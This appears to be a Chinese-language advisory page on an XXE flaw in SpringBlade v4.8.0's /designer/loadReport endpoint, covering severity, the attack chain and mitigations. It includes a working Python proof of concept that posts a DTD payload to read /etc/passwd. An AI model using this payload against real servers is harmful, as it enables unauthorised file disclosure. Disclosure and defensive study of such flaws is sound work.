CVE-2026-36765 CVSS 8.8 高危

CVE-2026-36765 SpringBlade XXE漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-36765

漏洞类型

XML外部实体注入 (XXE)

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SpringBlade

漏洞概述

SpringBlade v4.8.0版本的/designer/loadReport接口存在XML外部实体（XXE）漏洞。由于未正确过滤用户提供的XML数据，经过身份认证的攻击者可利用该漏洞注入恶意载荷。成功利用可能导致读取服务器敏感文件，甚至执行任意代码，严重威胁系统安全。

技术细节

该漏洞产生于SpringBlade处理报表加载请求时的XML解析环节。攻击者需拥有低权限账户，向/designer/loadReport端点发送特制的HTTP POST请求。攻击者在XML文档头部定义DTD（文档类型定义），引入外部实体（如SYSTEM协议指向本地文件）。由于XML解析器未禁用外部实体解析，服务器会解析该实体并将文件内容返回给攻击者。此外，若环境满足特定条件（如配合Java扩展库），该漏洞可进一步升级为远程代码执行（RCE），造成完全的系统沦陷。

攻击链分析

STEP 1

侦察与访问

攻击者识别目标为SpringBlade系统，并获取低权限用户凭证。

STEP 2

构造载荷

攻击者构造包含恶意DTD和外部实体定义的XML数据。

STEP 3

发送请求

攻击者将恶意XML数据发送至/designer/loadReport接口。

STEP 4

解析与执行

服务器解析XML，读取本地文件或执行恶意代码。

STEP 5

数据回传

服务器将敏感文件内容或执行结果返回给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target_url = "http://vulnerable-host/designer/loadReport"

# Malicious XML payload to read /etc/passwd
xxe_payload = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
"""

headers = {
    "Content-Type": "application/xml",
    "Authorization": "Bearer <low_privilege_token>" # Requires authenticated user
}

try:
    response = requests.post(target_url, data=xxe_payload, headers=headers)
    if response.status_code == 200:
        print("[+] Exploit successful!")
        print("[+] Response:")
        print(response.text)
    else:
        print("[-] Exploit failed, status code:", response.status_code)
except Exception as e:
    print("[-] Error:", e)

影响范围

SpringBlade v4.8.0

防御指南

临时缓解措施

建议立即检查系统版本，若受影响应尽快升级。在升级前，可临时通过WAF规则拦截针对/designer/loadReport接口的异常XML流量，或严格限制该接口仅允许内网可信IP访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-36765
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-36765
3 Details https://www.cvedetails.com/cve/CVE-2026-36765/
4 VulDB https://vuldb.com/cve/CVE-2026-36765
5 Link https://github.com/chillzhuang/SpringBlade
6 Link https://github.com/chillzhuang/SpringBlade/issues/37
7 Link https://github.com/chillzhuang/SpringBlade/issues/37

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表